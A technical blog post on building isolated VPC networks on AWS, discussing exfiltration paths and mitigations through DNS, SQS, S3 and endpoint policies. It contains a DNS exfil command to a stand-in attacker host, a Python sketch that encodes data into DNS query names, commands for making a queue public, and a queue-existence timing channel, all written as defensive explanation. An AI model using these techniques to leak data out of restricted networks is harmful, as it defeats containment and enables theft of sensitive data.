Isolated networks on AWS

2020.03.31

It is possible on AWS to have an isolated network where you cannot communicate in or out except through limited, controlled pathways. Setting something like this up has some gotchas. This post provides a CDK app (here) to help you experiment and see these issues for yourself, with discussions of the gotchas, their mitigations, and limitations of those mitigations.

Edit 2020-04-01: Based on input from kingwalterii, the S3 section has been updated to include Access Point restrictions.

Example in a physical network

To explain this setup, let’s first look at a simple physical example of an isolated computer. Imagine a single physical computer in an empty room. It is not connected to the Internet or any other network. It has power, is connected to a single LED light, and contains sensitive information. I then hire you (and you happen to be malicious) to write some code that turns this light on or off for me.

Physical example of an isolated network

Maybe the algorithm you write tells me to buy or sell a stock based on whether the light turns on or off. Your only input to me is a physical CD I put in the computer, and I run your code on this computer while I’m there by myself. You aren’t in the room. Under these circumstances, it is possible to keep you from learning whether the light was turned on or off, and to keep you from exfilling the sensitive data off the computer. We can assume that precautions have been taken against the attacker monitoring the power usage to the room, TEMPEST monitoring, or other threats.

Although contrived, this is a rough enough approximation of some real-world situations, especially those worried about inside threats.

Example in AWS

Now we want to recreate this setup in AWS, so instead of a local physical computer we have an EC2, and instead of an LED, a message is sent to an SQS. You give me code to run on the EC2, and it sends a 1 or 0 to the SQS. In order to have an isolated network, the VPC this EC2 runs in has no Internet Gateway, NAT Gateway, IPv6 Egress-Only Gateway, or other means of communicating out to the Internet or from the Internet into the network. The Route Table has a single entry for the 10.0.0.0/24 traffic to target the “local” network.
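The "no route out" property described above can be checked mechanically. Here is a minimal Python sketch, assuming you have saved the output of aws ec2 describe-route-tables and parsed it into a dict. The function name non_isolated_routes is my own, and the rule it applies (only "local" and vpce- gateway targets are acceptable) is a simplification for this experiment, not an official AWS check.

```python
from typing import Dict, List


def non_isolated_routes(route_tables: Dict) -> List[Dict]:
    """Return every route whose target is neither "local" nor a VPC endpoint.

    `route_tables` is the parsed JSON of `aws ec2 describe-route-tables`.
    """
    flagged = []
    for table in route_tables["RouteTables"]:
        for route in table["Routes"]:
            # Routes to NAT gateways, peering connections, etc. carry their
            # target in other keys, so GatewayId is simply absent for them.
            gateway = route.get("GatewayId", "")
            if gateway == "local" or gateway.startswith("vpce-"):
                continue
            flagged.append(route)
    return flagged
```

An empty result means every route stays inside the VPC or goes to a Gateway endpoint. Anything returned (an igw-, a NAT gateway, a peering connection) deserves a closer look.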

AWS example of an isolated network

In order to set up the EC2, we could create a custom AMI for it, provide it with a boot script, or use some other means. The output to the SQS would pass through a VPC endpoint, in this case an Interface endpoint, also known as PrivateLink. There are over 45 AWS services that support VPC endpoints.

Experimental isolated network

I’ve created a CDK app here that deploys an EC2 in an isolated network. You will need full admin privileges to deploy it. It is a basic attempt at an isolated network and, as a result, has some weaknesses that an attacker could abuse to exfil data if they were able to execute arbitrary code on the EC2. It does not have flaws that would allow an attacker in.

In order to make experimenting easier, this CDK app sets up SSM Session Manager, which gives us terminal access to our instance. The Amazon Linux 2 AMIs come with the SSM agent (code here) installed by default, which calls out to the SSM service and long-polls it, waiting for responses. In order to use SSM Session Manager, the app creates more VPC endpoints, for the ssm, ssmmessages, and ec2messages services. The experimental isolated network also adds a Gateway Endpoint for S3 so we can see what that looks like, as S3 and DynamoDB are the only two services that use Gateway Endpoints as opposed to Interface endpoints. This app should only cost about $32/mo, but you can quickly destroy it after experimenting with it.

Experimental isolated network setup

Connecting

To access the EC2 via a Session Manager terminal session, deploy this CDK app, then search the EC2 console for the instance named IsolatedNetworkExperimentStack. Select the instance and click “Connect”. For this experiment, use an admin role in your AWS account.

Finding the EC2 in the web console

Choose the “Session Manager” option and click “Connect”.

Connecting to the EC2 with Session Manager

You should now have a terminal session in your browser.

Session Manager session

DNS exfil

In order to confirm this network is isolated, you can try to ping 8.8.8.8, and you’ll see there are no responses. If you try to ping a domain, such as google.com, you’ll see:

$ ping google.com
PING google.com (172.217.13.78) 56(84) bytes of data.
^C
--- google.com ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3060ms

Again, we had 100% packet loss, but you’ll notice that it did figure out the IP for google.com. This is because, by default, all VPCs have a DNS server running on 169.254.169.253. That magic IP address is similar to the metadata service on 169.254.169.254 in that it can’t be blocked via Security Groups or NACLs, you have no access to the logs from it, and VPC Flow Logs don’t record connections to it. GuardDuty has some visibility into these DNS logs, but you do not, and you can’t rely on GuardDuty to detect (and definitely not prevent) exfil. There are a few other services in the 169.254/16 range, such as a time server and Windows license server, but DNS is the important one for our conversation because it allows exfil. I don’t believe any of the other services do.

As a simple example of what I mean by DNS exfil or DNS tunnelling, an attacker that has access to the EC2 could exfil data by doing something like:

host the_password_is_password123.attacker.com

The attacker would need to have set up a DNS server for the attacker.com domain that could record and potentially respond to these requests, possibly even allowing an SSH-like session to happen entirely through DNS, using something like https://github.com/yarrick/iodine. This idea is explored further by Dejan Zelic in his post Using DNS to break out of isolated networks in a AWS cloud environment.
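To make the mechanics of the host example concrete, here is a minimal Python sketch of how arbitrary bytes could be packed into DNS names and unpacked again on the receiving side. It only builds and parses strings and sends nothing. The function names, the hex encoding, and the sequence-number label are my own choices for illustration, not how iodine or any particular tool does it. The 63-character label and 253-character name limits are the standard DNS limits.

```python
from typing import Iterable, List

MAX_LABEL = 63   # longest single DNS label
MAX_NAME = 253   # longest full domain name in text form


def encode_queries(data: bytes, domain: str) -> List[str]:
    """Split data into names of the form <seq>.<hex chunk>.<domain>."""
    hex_data = data.hex()
    # Leave room for a sequence label of up to 4 digits and two dots.
    budget = min(MAX_LABEL, MAX_NAME - len(domain) - 6)
    budget -= budget % 2  # keep whole bytes in each chunk
    if budget < 2:
        raise ValueError("domain is too long to carry any payload")
    chunks = [hex_data[i:i + budget] for i in range(0, len(hex_data), budget)]
    return [f"{seq}.{chunk}.{domain}" for seq, chunk in enumerate(chunks)]


def decode_queries(names: Iterable[str], domain: str) -> bytes:
    """Rebuild the bytes from logged query names, in any arrival order."""
    suffix = "." + domain
    parts = {}
    for name in names:
        if not name.endswith(suffix):
            continue  # unrelated query
        seq, chunk = name[: -len(suffix)].split(".")
        parts[int(seq)] = chunk
    return bytes.fromhex("".join(parts[i] for i in sorted(parts)))
```

Each returned name would be resolved the same way as the host command above, and the attacker’s name server only needs to log the names it is asked about. This is also why filtering on response content does not help: the data leaves in the question, not the answer.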

Mitigations

To mitigate this, you need to turn off AWS’s DNS service for the VPC. This is discussed in the AWS docs here and involves the command modify-vpc-attribute. Obviously, once you do this, you will no longer have DNS for your EC2. You will not be able to use SSM Session Manager anymore because your EC2 will not know where the VPC endpoints it needs to beacon to are. You can either set up your own DNS server, or you can manually hard-code some values into your EC2’s /etc/hosts file. To find the IPs and domains you need, from a CLI with admin access (not the EC2, as it has neither the necessary privileges nor access to the necessary endpoints), run:

aws ec2 describe-vpc-endpoints

You’ll then be able to find an interface (ex. eni-0555bf66a28979277) and its associated DNS name (ex. ssm.us-east-1.amazonaws.com). Then pass the interface ID to this command to find its private IP address:

aws ec2 describe-network-interfaces --network-interface-ids eni-0555bf66a28979277

Then you can add lines to your /etc/hosts file such as:

10.0.0.188 ssm.us-east-1.amazonaws.com

Once you have all those VPC endpoints filled in, you can restart the EC2 and turn off DNS, but for simplicity for the rest of this tutorial, we can just leave DNS on and ignore this exfil path.
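The manual lookup above can be scripted. This is a rough Python sketch, assuming you have saved the JSON output of the two describe commands and parsed each into a dict. The function name hosts_lines is hypothetical, and the rule for picking names (skip the endpoint-specific ones that start with vpce-) is my assumption about which entries you want in /etc/hosts.

```python
from typing import Dict, List


def hosts_lines(endpoints: Dict, interfaces: Dict) -> List[str]:
    """Build /etc/hosts lines from the two parsed CLI responses.

    endpoints:  output of `aws ec2 describe-vpc-endpoints`
    interfaces: output of `aws ec2 describe-network-interfaces`
    """
    # Map each network interface ID to its primary private IP.
    ip_by_eni = {
        eni["NetworkInterfaceId"]: eni["PrivateIpAddress"]
        for eni in interfaces["NetworkInterfaces"]
    }
    lines = []
    for endpoint in endpoints["VpcEndpoints"]:
        # Assumption: names that do not start with "vpce-" are the regular
        # service names, such as ssm.us-east-1.amazonaws.com.
        names = [
            entry["DnsName"]
            for entry in endpoint.get("DnsEntries", [])
            if not entry["DnsName"].startswith("vpce-")
        ]
        # Gateway endpoints have no network interfaces and are skipped here.
        for eni_id in endpoint.get("NetworkInterfaceIds", []):
            ip = ip_by_eni.get(eni_id)
            if ip is None:
                continue
            lines.extend(f"{ip} {name}" for name in names)
    return lines
```

If an endpoint has interfaces in several subnets, this emits one line per IP for the same name. Resolvers typically use the first match in /etc/hosts, so you may want to keep only the line for the instance’s own subnet.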

Another option, which I have not tried yet, but have heard from others, is to use Route 53 Resolver.

Accessing the SQS

The IAM policy of the EC2 grants sqs:* on *, and the CDK app created an SQS queue. If we try to list the queues with aws --region us-east-1 sqs list-queues, the request will hang. Running with --debug helps show that we can’t access queue.amazonaws.com. When making requests from the isolated subnet, we need to specify the endpoint URL to use so that requests go through our VPC endpoint. This is done with:

aws --region us-east-1 --endpoint-url https://sqs.us-east-1.amazonaws.com sqs list-queues

We can also send messages to this queue with:

aws --region us-east-1 --endpoint-url https://sqs.us-east-1.amazonaws.com sqs send-message --queue-url https://queue.amazonaws.com/000000000000/IsolatedNetworkExperimentStack-queue276F7297-1PHZ7GJS3L52F --message-body hello

Our VPC endpoint has a policy of:

{
  "Statement": [
    {
      "Action": "*",
      "Effect": "Allow",
      "Principal": "*",
      "Resource": "*"
    }
  ]
}

This means we can communicate with any SQS, including one in an attacker controlled AWS account. We might have a lot of applications in our isolated network that need to communicate with various SQS queues, so we don’t want to lock our endpoint policy down too tightly. We could lock down our IAM policy on the EC2 IAM Role, but an attacker could just bring their own access key along.

Mitigation

To restrict what queues can be accessed through our VPC endpoint, we can change the endpoint policy for the VPC endpoint for SQS to:

{
    "Statement": [
        {
            "Action": "sqs:*",
            "Effect": "Allow",
            "Resource": [
                "arn:aws:sqs:*:000000000000:*",
                "arn:aws:sqs:*:111111111111:*"
            ],
            "Principal": "*",
            "Condition": {
                "StringEquals": {
                    "aws:PrincipalOrgID": "o-0000000000"
                }
            }
        }
    ]
}

This ensures that resources in the isolated network can only use the VPC endpoint for SQS if they try to interact with SQS queues controlled by accounts we own (000000000000 and 111111111111) and only if the principal is from our Org (o-0000000000) so an attacker can’t use their own access key.
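If you manage several isolated VPCs, it can be handy to generate this policy rather than hand-edit it. Below is a small Python sketch that does so. The function name is hypothetical, and I’ve written the resources in full ARN form (arn:aws:sqs:*:ACCOUNT:*), which is my assumption for matching any queue in an account. Attaching the result to the endpoint is left out.

```python
import json
from typing import Dict, Iterable


def sqs_endpoint_policy(account_ids: Iterable[str], org_id: str) -> Dict:
    """Build an SQS endpoint policy limited to our accounts and our Org."""
    resources = []
    for account_id in account_ids:
        # AWS account IDs are 12 digits; reject typos and stray wildcards.
        if not (len(account_id) == 12 and account_id.isdigit()):
            raise ValueError(f"not a 12-digit account ID: {account_id!r}")
        resources.append(f"arn:aws:sqs:*:{account_id}:*")
    return {
        "Statement": [
            {
                "Action": "sqs:*",
                "Effect": "Allow",
                "Resource": resources,
                "Principal": "*",
                "Condition": {
                    "StringEquals": {"aws:PrincipalOrgID": org_id}
                },
            }
        ]
    }


if __name__ == "__main__":
    policy = sqs_endpoint_policy(["000000000000", "111111111111"], "o-0000000000")
    print(json.dumps(policy, indent=4))
```

Validating the account IDs matters more than it looks: a stray "*" in that list would quietly turn the policy back into the wide-open one.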

Limitations

Public queues

An attacker could still create a publicly accessible SQS queue in one of our accounts from inside the isolated network, and then access that queue from their own attacker account. For example, this can be done by creating the file attributes.json with the contents:

{"Policy":"{\"Statement\": {\"Action\": \"sqs:*\",\"Effect\": \"Allow\",\"Resource\": \"*\",\"Principal\": \"*\"}}"}

And then running:

aws --region us-east-1 --endpoint-url https://sqs.us-east-1.amazonaws.com sqs create-queue --queue-name test --attributes file://attributes.json

The attacker would need to know the account ID in order to find the SQS.

Timing attacks

Even if you restricted queues from being made public somehow (which is not currently possible with IAM or other means), an attacker could still use timing attacks: code inside the isolated network creates and deletes a queue over time, and the attacker, from another account, attempts to send messages to it. Each attempt results in either AccessDenied (the queue exists) or AWS.SimpleQueueService.NonExistentQueue (it does not), so the queue’s existence at a given moment leaks one bit.
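To show why this counts as an exfil path and not just a curiosity, here is a toy Python model of the channel. It makes no AWS calls. The observe function stands in for "what error would the outside account get right now", and everything apart from the two error codes named above is hypothetical scaffolding of mine.

```python
from typing import List

EXISTS_ERROR = "AccessDenied"
MISSING_ERROR = "AWS.SimpleQueueService.NonExistentQueue"


def to_bits(data: bytes) -> List[int]:
    """Most-significant-bit-first bits of each byte."""
    return [(byte >> shift) & 1 for byte in data for shift in range(7, -1, -1)]


def from_bits(bits: List[int]) -> bytes:
    """Inverse of to_bits; trailing bits that don't fill a byte are dropped."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


def observe(queue_exists: bool) -> str:
    """Error the outside account would see in one time slot (simulated)."""
    return EXISTS_ERROR if queue_exists else MISSING_ERROR


def decode_bit(error_code: str) -> int:
    """Outside account's view: queue present means 1, absent means 0."""
    if error_code == EXISTS_ERROR:
        return 1
    if error_code == MISSING_ERROR:
        return 0
    raise ValueError(f"unexpected error code: {error_code}")
```

The inside code would hold the queue in existence for slots that encode a 1 and delete it for slots that encode a 0. The channel is slow, but a key or password is only a few hundred bits.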

Accessing S3

Unlike most services that use Interface endpoints, S3 and DynamoDB were the first services that could be accessed directly from a VPC and use Gateway Endpoints. The difference is that Gateway endpoints exist as route table entries, whereas Interface endpoints exist as network interfaces. Interface endpoints have IP addresses and can have Security Groups associated with them. They also cost $7/mo and $0.01/GB. Gateway endpoints are free, and do not have Security Groups associated with them.

Running aws ec2 describe-route-tables I see the following in the response:

"Routes": [
    {
        "DestinationCidrBlock": "10.0.0.0/24",
        "GatewayId": "local",
        "Origin": "CreateRouteTable",
        "State": "active"
    },
    {
        "DestinationPrefixListId": "pl-63a5400a",
        "GatewayId": "vpce-029ddfccced52cd28",
        "Origin": "CreateRoute",
        "State": "active"
    }
]

The first element shows that 10.0.0.0/24 is routed locally, as that is the subnet range. The next element is the Gateway endpoint for S3. I can confirm this by running aws ec2 describe-prefix-lists and I see in the response:

{
    "Cidrs": [
        "54.231.0.0/17",
        "52.216.0.0/15",
        "3.5.16.0/21",
        "3.5.0.0/20"
    ],
    "PrefixListId": "pl-63a5400a",
    "PrefixListName": "com.amazonaws.us-east-1.s3"
},

Those IPs are associated with S3 servers.
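As a quick sanity check on what that route actually covers, the following Python sketch tests whether an address falls inside the prefix list. The CIDRs are copied from the response above and will differ by region and over time, so treat them as sample data. The function name is my own.

```python
import ipaddress
from typing import Iterable

# Copied from the describe-prefix-lists response above (us-east-1, sample data).
S3_PREFIX_LIST_CIDRS = [
    "54.231.0.0/17",
    "52.216.0.0/15",
    "3.5.16.0/21",
    "3.5.0.0/20",
]


def matches_prefix_list(ip: str, cidrs: Iterable[str] = S3_PREFIX_LIST_CIDRS) -> bool:
    """True if `ip` is inside any CIDR, i.e. it would use the Gateway endpoint route."""
    address = ipaddress.ip_address(ip)
    return any(address in ipaddress.ip_network(cidr) for cidr in cidrs)
```

For example, matches_prefix_list("52.217.10.20") is true because 52.216.0.0/15 spans 52.216.0.0 through 52.217.255.255, while matches_prefix_list("8.8.8.8") is false, which matches the failed ping earlier.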

Similar to the SQS Interface policy, we can set a policy on the S3 Gateway endpoint, but because S3 buckets do not have account IDs in their ARNs, we have to individually list each S3 bucket or use S3 Access Points.

To restrict access similar to the SQS, you can use:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "s3:ListBucket",
                "s3:GetObject"
            ],
            "Resource": "*",
            "Condition": {
                "StringEquals": {
                    "s3:AccessPointNetworkOrigin": "VPC",
                    "aws:PrincipalOrgID": "o-0000000000",
                    "s3:DataAccessPointAccount": ["000000000000", "111111111111"]
                }
            }
        }
    ]
}

The CDK app includes an access point that you can access from the CLI with:

aws s3 ls arn:aws:s3:us-east-1:000000000000:accesspoint/isolatedaccesspoint

Other Interface endpoints

I mentioned that there were over 45 services that support VPC Interface endpoints. Unfortunately, only 24 support endpoint policies, which are listed here. I therefore believe for example that an attacker could provide credentials for his own account to the SSM agent on the EC2 to trick it into connecting to his account through the Interface endpoints created for it in this VPC, and you cannot stop that. For that reason, in an isolated network, SSM Session Manager is not an ideal connection mechanism, but it satisfies our needs for our experimenting.

Other exfil paths in isolated networks

One interesting aspect of “comprehensive” exfiltration control is governing delegated/secondary API calls triggered by the APIs you actually call. Easy example would be s3:PutObject with a local bucket/principal using SSE-KMS in a remote account which then gets CT events. (Dan Peebles)

As Dan mentioned there are also exfil paths via indirect calls and events that get recorded in attacker controlled CloudTrail logs. Data can be leaked by polling an account for whether or not resources exist. Rhino Security for example showed how this can be done to detect the existence of IAM roles in a target account.

Little has been written about isolated networks on AWS and the mistakes that can be made with them, so I hope I’ve helped open up more discussion of and research into them. I also recommend reading Square’s post titled Adopting AWS VPC Endpoints at Square, authored by Harihara Krishnan Narayanan. This is an area of AWS that is ripe for more research, tooling to detect common mistakes, and best practice guidance.